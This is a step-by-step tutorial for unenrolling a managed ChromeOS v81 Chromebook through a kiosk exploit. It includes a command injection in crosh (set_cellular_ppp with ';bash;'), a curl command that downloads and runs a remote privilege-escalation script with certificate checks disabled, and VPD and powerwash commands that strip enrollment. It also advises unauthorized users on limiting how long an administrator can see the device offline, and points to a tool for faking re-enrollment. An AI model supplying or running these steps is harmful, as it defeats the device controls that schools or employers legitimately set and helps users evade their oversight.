v81 Unenrollment - Kiosk Exploit

Prerequisites

A USB drive, 1gb or larger, formatted with FAT32

Section I - Downloading CHRWN

In order to use the kiosk exploit, we first need a copy of CHRWN, which allows for crosh to be loaded in a kiosk environment. Download it here. Unzip the file onto the very root of your USB drive.

Section II - Launching the Kiosk

Press Ctrl+Shift+Q twice to sign out, then disconnect from the Wi-Fi and select any kiosk app. Wait for an error screen to appear. Press Ctrl+Alt+Z to enable ChromeVox and start spamming Search+O. You can hold down the search key, but must spam the O key. While spamming, click the "Troubleshoot" button and continue to spam until a browser window appears (which may take a few seconds). Then, open a new tab and press Ctrl+Alt+Z to disable ChromeVox. Visit chrome://os-settings to turn Wi-Fi back on.

Section III - Opening the Extension

Go to chrome://extensions and enable developer mode (switch in the top-left of the screen), then select "Load Unpacked". Find your USB drive and select the CHRWN folder. Immediately, a crosh window will appear, and you will be able to continue.

Section IV - Obtain Root Access

Inside of crosh, run the following command:

set_cellular_ppp \';bash;exit;\'

You should be dropped into a bash shell. If not, check the troubleshooting guide.

Now, run the following command to download and run the privilege escalation script:

cd ~/Downloads && curl -LOk https://raw.githubusercontent.com/rainestorme/resources/main/80.sh && bash <(cat ~/Downloads/80.sh)

You should be dropped into a bash shell with a red prompt. If not, check the troubleshooting guide.

Section V - Unenrolling and Powerwashing

Run the following command:

vpd -i RW_VPD -s check_enrollment=0

Now, we need to powerwash the device to fully unenroll. Run the following commands:

echo "fast safe" >/mnt/stateful_partition/factory_install_reset
reboot

After powerwashing, your Chromebook will behave like a personal device and will be completely unrestricted.

danger

Your administrator wil be able to see that your device is "offline", and you should spend as little time as possible in this state if you are not authorized to be following this tutorial.

Section VI - Next Steps

If you want to re-enroll but keep your Chromebook unrestricted, continue to fakemurk

...or you could just keep your device like this, and use it as a personal device. The choice is yours.

Prerequisites​

Section I - Downloading CHRWN​

Section II - Launching the Kiosk​

Section III - Opening the Extension​

Section IV - Obtain Root Access​

Section V - Unenrolling and Powerwashing​

Section VI - Next Steps​